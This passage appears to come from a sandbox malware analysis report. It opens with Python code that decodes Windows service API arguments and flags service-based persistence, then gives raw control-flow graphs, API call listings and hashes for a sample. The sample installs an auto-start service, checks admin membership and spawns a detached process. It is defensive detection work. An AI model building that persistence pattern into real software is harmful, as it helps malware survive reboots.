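ApiCall = namedtuple("ApiCall", "api module args ref")  # args: ints, None where the sandbox printed '?'

def parse_line(line):
    """Parse one listing line; headings such as 'APIs' return None."""
    m = _LINE.match(line)
    if not m:
        return None
    args = [None if a.strip() == "?" else int(a, 16) for a in m["args"].split(",") if a.strip()]
    return ApiCall(m["api"], m["mod"], args, int(m["ref"], 16))

# Bitmask / enumeration tables (winsvc.h, winbase.h). Composite masks are listed too.
SCM_ACCESS = {0x1: "SC_MANAGER_CONNECT", 0x2: "SC_MANAGER_CREATE_SERVICE", 0x4: "SC_MANAGER_ENUMERATE_SERVICE",
              0x8: "SC_MANAGER_LOCK", 0x10: "SC_MANAGER_QUERY_LOCK_STATUS", 0x20: "SC_MANAGER_MODIFY_BOOT_CONFIG",
              0xF003F: "SC_MANAGER_ALL_ACCESS"}
SVC_ACCESS = {0x1: "SERVICE_QUERY_CONFIG", 0x2: "SERVICE_CHANGE_CONFIG", 0x4: "SERVICE_QUERY_STATUS",
              0x8: "SERVICE_ENUMERATE_DEPENDENTS", 0x10: "SERVICE_START", 0x20: "SERVICE_STOP",
              0x40: "SERVICE_PAUSE_CONTINUE", 0x80: "SERVICE_INTERROGATE", 0x100: "SERVICE_USER_DEFINED_CONTROL",
              0xF01FF: "SERVICE_ALL_ACCESS"}
SVC_TYPE = {0x1: "SERVICE_KERNEL_DRIVER", 0x2: "SERVICE_FILE_SYSTEM_DRIVER", 0x10: "SERVICE_WIN32_OWN_PROCESS",
            0x20: "SERVICE_WIN32_SHARE_PROCESS", 0x100: "SERVICE_INTERACTIVE_PROCESS"}
START_TYPE = {0: "SERVICE_BOOT_START", 1: "SERVICE_SYSTEM_START", 2: "SERVICE_AUTO_START",
              3: "SERVICE_DEMAND_START", 4: "SERVICE_DISABLED"}
ERROR_CONTROL = {0: "SERVICE_ERROR_IGNORE", 1: "SERVICE_ERROR_NORMAL", 2: "SERVICE_ERROR_SEVERE", 3: "SERVICE_ERROR_CRITICAL"}
INFO_LEVEL = {1: "SERVICE_CONFIG_DESCRIPTION", 2: "SERVICE_CONFIG_FAILURE_ACTIONS", 3: "SERVICE_CONFIG_DELAYED_AUTO_START_INFO"}
CREATE_FLAGS = {0x1: "DEBUG_PROCESS", 0x2: "DEBUG_ONLY_THIS_PROCESS", 0x4: "CREATE_SUSPENDED", 0x8: "DETACHED_PROCESS",
                0x10: "CREATE_NEW_CONSOLE", 0x200: "CREATE_NEW_PROCESS_GROUP", 0x8000000: "CREATE_NO_WINDOW"}

# (api, zero-based argument index) -> (parameter name, "bits" or "enum", table)
DECODERS = {("OpenSCManagerA", 2): ("dwDesiredAccess", "bits", SCM_ACCESS),
            ("CreateServiceA", 3): ("dwDesiredAccess", "bits", SVC_ACCESS),
            ("CreateServiceA", 4): ("dwServiceType", "bits", SVC_TYPE),
            ("CreateServiceA", 5): ("dwStartType", "enum", START_TYPE),
            ("CreateServiceA", 6): ("dwErrorControl", "enum", ERROR_CONTROL),
            ("ChangeServiceConfig2A", 1): ("dwInfoLevel", "enum", INFO_LEVEL),
            ("OpenServiceA", 2): ("dwDesiredAccess", "bits", SVC_ACCESS),
            ("CreateProcessA", 5): ("dwCreationFlags", "bits", CREATE_FLAGS)}

def decode_bits(value, table):
    """Split a mask into names, trying the widest (composite) masks first."""
    names, rest = [], value
    for bit, name in sorted(table.items(), reverse=True):
        if (rest & bit) == bit:  # parenthesised: '==' binds tighter than '&' in Python
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(hex(rest))  # bits missing from the table
    return names or ["0"]

def describe(call):
    """Symbolic names for each argument of `call` that DECODERS knows about."""
    out = {}
    for (api, idx), (param, kind, table) in DECODERS.items():
        if api == call.api and idx < len(call.args) and call.args[idx] is not None:
            v = call.args[idx]
            out[param] = decode_bits(v, table) if kind == "bits" else table.get(v, hex(v))
    return out

def service_persistence(calls):
    """Findings for: SCM opened with CREATE_SERVICE, service created with AUTO_START,
    StartServiceA issued on it. A later OpenServiceA+StartServiceA pair is not counted."""
    findings, created = [], False
    for c in calls:
        d = describe(c)
        if c.api == "OpenSCManagerA" and "SC_MANAGER_CREATE_SERVICE" in d.get("dwDesiredAccess", []):
            findings.append("SCM opened with SC_MANAGER_CREATE_SERVICE")
        elif c.api == "CreateServiceA" and d.get("dwStartType") == "SERVICE_AUTO_START":
            created = True
            findings.append("service created as %s, SERVICE_AUTO_START" % " | ".join(d.get("dwServiceType", ["?"])))
        elif c.api == "StartServiceA" and created:
            findings.append("service started right after creation")
            created = False
    return findings

def analyze(lines):
    """Parse a listing and return (calls, findings)."""
    calls = [c for c in map(parse_line, lines) if c]
    return calls, service_persistence(calls)

# Copied from the API listings in this report (service installer, RNG call, process spawn).
REPORT_LINES = [
    "• OpenSCManagerA.SECHOST(00000000,00000000,00000002), ref: 009E0537",
    "• CreateServiceA.ADVAPI32(00000000,012A0610,012A0610,000F01FF,00000110,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 009E0596",
    "• ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?), ref: 009E0615",
    "• StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 009E062A",
    "• CloseServiceHandle.SECHOST(00000000), ref: 009E06A7",
    "• OpenServiceA.ADVAPI32(00000000,012A0610,00000010), ref: 009E06EB",
    "• StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 009E072D",
    "• CloseServiceHandle.ADVAPI32(00000000), ref: 009E073E",
    "• CryptGenRandom.ADVAPI32(00000000,00000004,?,?), ref: 009E0C10",
    "• CreateProcessA.KERNELBASE(?,009EED48,00000000,00000000,00000000,00000008,00000000,00000000,00000044,?,?,?,?,?,?,00000000), ref: 009FFBF1",
]
```

Running `analyze(REPORT_LINES)` and printing `describe(c)` for each call resolves the CreateServiceA arguments to SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS, SERVICE_AUTO_START and SERVICE_ERROR_IGNORE, the ChangeServiceConfig2A level to SERVICE_CONFIG_DESCRIPTION, the OpenServiceA access to SERVICE_START and the CreateProcessA flags to DETACHED_PROCESS; `decode_bits` tries composite masks first so that 0xF01FF reads as SERVICE_ALL_ACCESS rather than nine separate rights. In the control-flow graph the second StartServiceA under OpenServiceA is the branch taken when CreateServiceA fails, typically because the service already exists, which is why the rule keys on the first create-then-start pair instead of counting StartServiceA calls. The interactive-process flag is effectively a no-op on current Windows, where interactive services are disabled by default, but it is still a useful hunting artefact because legitimate installers rarely set it.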

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            control_flow_graph 858 9ffa80-9ffaa8 859 9ffabe-9ffadf 858->859 860 9ffaaa-9ffab7 858->860 861 9ffae1-9ffafe 859->861 862 9ffb00-9ffb19 859->862 860->859 863 9ffb20-9ffbf9 call 9fa7e0 * 2 CreateProcessA 861->863 862->863 868 9ffc8f-9ffcb3 863->868 869 9ffbff-9ffc8e CloseHandle * 2 863->869
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateProcessA.KERNELBASE(?,009EED48,00000000,00000000,00000000,00000008,00000000,00000000,00000044,?,?,?,?,?,?,00000000), ref: 009FFBF1
                                                                                                                                                                                                            • CloseHandle.KERNEL32(009EED48,?,?,?,?,?,00000000), ref: 009FFC2F
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 009FFC58
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseHandle$CreateProcess
                                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                                            • API String ID: 2922976086-2746444292
                                                                                                                                                                                                            • Opcode ID: f9a12e02d18f54893bf3c8ac3c15b850ea4c597d7b5c7912f61241a60c96f672
                                                                                                                                                                                                            • Instruction ID: 0f8849c3aa8bb04b9609ab00aa1f309939e898099abbfce0f70ecf28e2b8197b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9a12e02d18f54893bf3c8ac3c15b850ea4c597d7b5c7912f61241a60c96f672
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC510039A51218DBD704DFE4FC427FA3BF4FB89711F00802AE1469A2A4E7759453CB85

Control-flow Graph
control_flow_graph 870 9dd000-9dd088 call a05df0 873 9dd08a-9dd0a2 870->873 874 9dd0d0-9dd12f call 9ed990 call 9f3110 CreateFileA 870->874 875 9dd0be-9dd0ca 873->875 876 9dd0a4-9dd0bc 873->876 881 9dd131-9dd13b 874->881 882 9dd140-9dd150 874->882 875->874 876->874 883 9dd404-9dd428 call 9ffcc0 881->883 884 9dd166-9dd169 882->884 885 9dd152-9dd15f 882->885 891 9dd42a-9dd439 883->891 892 9dd440-9dd468 call 9fa7e0 883->892 887 9dd170-9dd19c 884->887 885->884 889 9dd19e-9dd1b3 887->889 890 9dd1b9-9dd24a ReadFile call 9fff30 call 9dd670 call 9e0110 call 9dc530 887->890 889->890 903 9dd250-9dd25a 890->903 904 9dd3e3-9dd3ff CloseHandle 890->904 891->892 905 9dd25c-9dd268 903->905 906 9dd26e-9dd28e call 9e4290 903->906 904->883 905->906 906->887 909 9dd294-9dd2c2 906->909 910 9dd2e8-9dd33a CloseHandle call 9ffcc0 909->910 911 9dd2c4-9dd2e2 909->911 914 9dd33c-9dd348 910->914 915 9dd374-9dd397 call 9fa7e0 910->915 911->910 914->915 916 9dd34a-9dd36e 914->916 919 9dd39d-9dd3b9 915->919 920 9dd469 915->920 916->915 921 9dd3bf-9dd3e2 919->921 922 9dd473-9dd47e 919->922 920->922
APIs
• CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009DD11A
• ReadFile.KERNEL32(00000000,?,00005000,?,00000000), ref: 009DD1CC
• CloseHandle.KERNEL32(00000000,?,00000000), ref: 009DD3EE
• CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 009DD2E9
  • Part of subcall function 009FFCC0: ReleaseMutex.KERNEL32(009DD410,?,009DD410,00000128), ref: 009FFCE9
Memory Dump Source
• Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
• Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
Similarity
• API ID: CloseFileHandle$CreateMutexReadRelease
• String ID:
• API String ID: 1760212717-0
• Opcode ID: bf0515dcc65bac66d7783563db39221e8fd36783abb84f12014c4513ecc964e0
• Instruction ID: 76c4781c4509a40ea030ded0cf6782885c0fa09e9374c9abc26d9e1aaa0542fe
• Opcode Fuzzy Hash: bf0515dcc65bac66d7783563db39221e8fd36783abb84f12014c4513ecc964e0
• Instruction Fuzzy Hash: A9B143BAA01604DBD704DFE4FC867A93BB5FBD8312F11C456E145862B0EB7149A7CB41

Control-flow Graph
control_flow_graph 973 9e1d90-9e1e21 call a05df0 call 9f3110 978 9e1e4c-9e1e91 CreateFileA 973->978 979 9e1e23-9e1e4b call 9ffcc0 973->979 981 9e1e93-9e1ed0 call 9ffcc0 978->981 982 9e1ed1-9e1ef0 978->982 985 9e1f0c-9e1f18 982->985 986 9e1ef2-9e1f06 982->986 988 9e1f20-9e1f3e 985->988 986->985 989 9e1f59-9e1f85 988->989 990 9e1f40-9e1f57 988->990 991 9e1f8b-9e2063 call 9db620 call 9fff30 WriteFile 989->991 990->991 991->988 996 9e2069-9e209c FindCloseChangeNotification call 9ffcc0 991->996 998 9e20a1-9e20b6 996->998 999 9e20b8 998->999 1000 9e20c2-9e20ca 998->1000 999->1000
APIs
  • Part of subcall function 009F3110: WaitForSingleObject.KERNEL32(?,00004E20,?,009DD0F2,00000128), ref: 009F31AD
• CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 009E1E7B
  • Part of subcall function 009FFCC0: ReleaseMutex.KERNEL32(009DD410,?,009DD410,00000128), ref: 009FFCE9
Memory Dump Source
• Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
• Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
Similarity
• API ID: CreateFileMutexObjectReleaseSingleWait
• String ID:
• API String ID: 1564016613-0
• Opcode ID: 86bd1a580ac627909eb7dc0a30719ce3f9a462c3afc623551d6c3d8b18f77c78
• Instruction ID: 7d022a6a7996e242e272378c3102cf937df472a7d0374d5bae725cd4843de80e
• Opcode Fuzzy Hash: 86bd1a580ac627909eb7dc0a30719ce3f9a462c3afc623551d6c3d8b18f77c78
• Instruction Fuzzy Hash: 0371DF79611208DFC304CFE9FC96AAA37B4FB99316F418119E905972B0DB359863CF81

Control-flow Graph
control_flow_graph 1001 9db7a0-9db84c AllocateAndInitializeSid 1002 9db84e-9db85b 1001->1002 1003 9db861-9db864 1001->1003 1002->1003 1004 9db8ee-9db90e 1003->1004 1005 9db86a-9db885 CheckTokenMembership 1003->1005 1006 9db8b4-9db8e8 1005->1006 1007 9db887-9db8ae 1005->1007 1006->1004 1007->1006
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 009DB82B
• CheckTokenMembership.KERNELBASE(00000000,?,?), ref: 009DB87D
Memory Dump Source
• Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
• Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
Similarity
• API ID: AllocateCheckInitializeMembershipToken
• String ID:
• API String ID: 1663163955-0
• Opcode ID: 9305acac8d9bb0afff04a7f5136104a5466c74832d2aff0ad0f983a0e1601d51
• Instruction ID: 8326e7e60d8d0dfac591510392c08cbc9f5c9f8d3914eebe01f5309cf83032f6
• Opcode Fuzzy Hash: 9305acac8d9bb0afff04a7f5136104a5466c74832d2aff0ad0f983a0e1601d51
• Instruction Fuzzy Hash: 6931BC78901388EFD704CFF4ED999BA7B78FB9A301B01815AE80296270C3705917DB51

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 1009 9e2eb0-9e2ef9 GetProcessHeap RtlFreeHeap 1010 9e2efb-9e2f07 1009->1010 1011 9e2f30-9e2f42 1009->1011 1012 9e2f1a-9e2f2f 1010->1012 1013 9e2f09-9e2f19 1010->1013 1014 9e2f56-9e2f57 1011->1014 1015 9e2f44-9e2f50 1011->1015 1015->1014
APIs
• GetProcessHeap.KERNEL32(00000000,009E0367,?,009E0367,00000000), ref: 009E2ED1
• RtlFreeHeap.NTDLL(00000000,?,009E0367,00000000), ref: 009E2ED8
Memory Dump Source
• Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
• Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
• Opcode ID: a343c12eace479fafe7a3391502ff3fcfe3380ccd97ccc08bf1ee024380ce086
• Instruction ID: 711b1b36ad373c24605d8e86f9e7e282cf5c9385b0bfb28c113cfb3025508d15
• Opcode Fuzzy Hash: a343c12eace479fafe7a3391502ff3fcfe3380ccd97ccc08bf1ee024380ce086
• Instruction Fuzzy Hash: 8D017C79504288DBC724CFE9FE5546A37F9F7987257508316E01A8B2B0D3329C97CB15

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 1016 9de2c0-9de2e2 1017 9de2e4-9de2ec 1016->1017 1018 9de2f2-9de306 GetProcessHeap RtlAllocateHeap 1016->1018 1017->1018
APIs
• GetProcessHeap.KERNEL32(00000000,?,?,00A0220A,02167FFC,?,?,?,?,009F463C), ref: 009DE2F8
• RtlAllocateHeap.NTDLL(00000000,?,00A0220A,02167FFC,?,?,?,?,009F463C), ref: 009DE2FF
Memory Dump Source
• Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
• Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
Similarity
• API ID: Heap$AllocateProcess
• String ID:
• API String ID: 1357844191-0
• Opcode ID: f16b0b59db5c697199693f4fe4521dec0968a6cae56726d08118e3ef7e096b68
• Instruction ID: 5018bd38071d6999664bd1b28fc4381cc4ff6cc5d3f10a726d5a30e037da0123
• Opcode Fuzzy Hash: f16b0b59db5c697199693f4fe4521dec0968a6cae56726d08118e3ef7e096b68
• Instruction Fuzzy Hash: 76E04F76514204DFCB04DFE5EC49AD937B8E748305B008119F60AC6261C631A5838B94

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 1221 9f3cf0-9f3d33 1222 9f3d35-9f3d3f 1221->1222 1223 9f3d41-9f3d51 1221->1223 1224 9f3d58-9f3e30 call 9de430 call 9d2f90 call 9dc580 call 9e1bb0 CreateFileA 1222->1224 1223->1224 1233 9f3e53-9f3e64 1224->1233 1234 9f3e32-9f3e51 1224->1234 1236 9f3e66 1233->1236 1237 9f3e70-9f3e84 1233->1237 1235 9f3e8a-9f3e9d 1234->1235 1238 9f3e9f-9f3ec0 1235->1238 1239 9f3ec2-9f3eca 1235->1239 1236->1237 1237->1235 1240 9f3ed0-9f3ef7 call 9fa7e0 1238->1240 1239->1240
APIs
• CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 009F3E0B
Memory Dump Source
• Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
• Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 4c26716bb4c073b7557be37fd0dc21693c5eba9dd1435b0fb424abb2ef405ed5
• Instruction ID: ad5b5917a52c3d0492b24549a9bc06da42bc6636f8c3fbe5944c7a6c70060416
• Opcode Fuzzy Hash: 4c26716bb4c073b7557be37fd0dc21693c5eba9dd1435b0fb424abb2ef405ed5
• Instruction Fuzzy Hash: 0941DD7AA50308DBC350EBE0FC827A53BB0FBD9701F218615E641962B4E77949A3CB85

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 1243 9f45a9-9f4637 call 9f0610 call 9ffde0 call 9e9410 call a01660
APIs
Memory Dump Source
• Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
• Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: becfd5f3b5691a2dc0466f6583effe11da7baf907b1783ca6dabaf8e4889ee36
• Instruction ID: 9a783c89bb3e2861f0f6760016ad9fe5f4eb8a1cc8018239fa41d1d223d62040
• Opcode Fuzzy Hash: becfd5f3b5691a2dc0466f6583effe11da7baf907b1783ca6dabaf8e4889ee36
• Instruction Fuzzy Hash: 8611047AA512098FC710EFF4FE8956937B0FBD53463058826E142862B5FB364413D781

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 1253 9d2800-9d2832 call 9fb150 1256 9d283e-9d2842 ExitProcess 1253->1256 1257 9d2834 1253->1257 1257->1256
APIs
Memory Dump Source
• Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
• Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: 233d91fd9a26e77d5b8211320e67d156e9dab4154f19ef02e248df83533ae2e7
• Instruction ID: 04e1e452eaa030daae98deda51cb39f395bf54fb194e4d011c90fe7f38c215f5
• Opcode Fuzzy Hash: 233d91fd9a26e77d5b8211320e67d156e9dab4154f19ef02e248df83533ae2e7
• Instruction Fuzzy Hash: 3AE08C3C10030CCBC308DFE8D8D687637A9EB86304754C21B99164B2A1CA39A487DF81

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 1258 9da4e0-9da53a lstrlen 1259 9da53c-9da548 1258->1259 1260 9da54e-9da564 1258->1260 1259->1260
APIs
Memory Dump Source
• Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
• Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrlen
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1659193697-0
                                                                                                                                                                                                            • Opcode ID: 22e6905838fb92f0446a6585a068e19cf296a7d68aaa01dcdcd890b706c82a61
                                                                                                                                                                                                            • Instruction ID: 56bc7fb1c161a0fcee1d4ce2bd6eeb66c5bfdadadf54100390ea82a3784227ee
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 22e6905838fb92f0446a6585a068e19cf296a7d68aaa01dcdcd890b706c82a61
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02F0AF7D650224EFC701DFE1FD0A0AA3BB8FBDA3613414012E40692134E7764867DF82
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,80000000), ref: 009DB0AA
                                                                                                                                                                                                            • EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,?,00000024,?,?,00000000), ref: 009DB15A
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 009DB17A
                                                                                                                                                                                                            • EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,00000000,?,?,?,00000000), ref: 009DB216
                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 009DB41C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
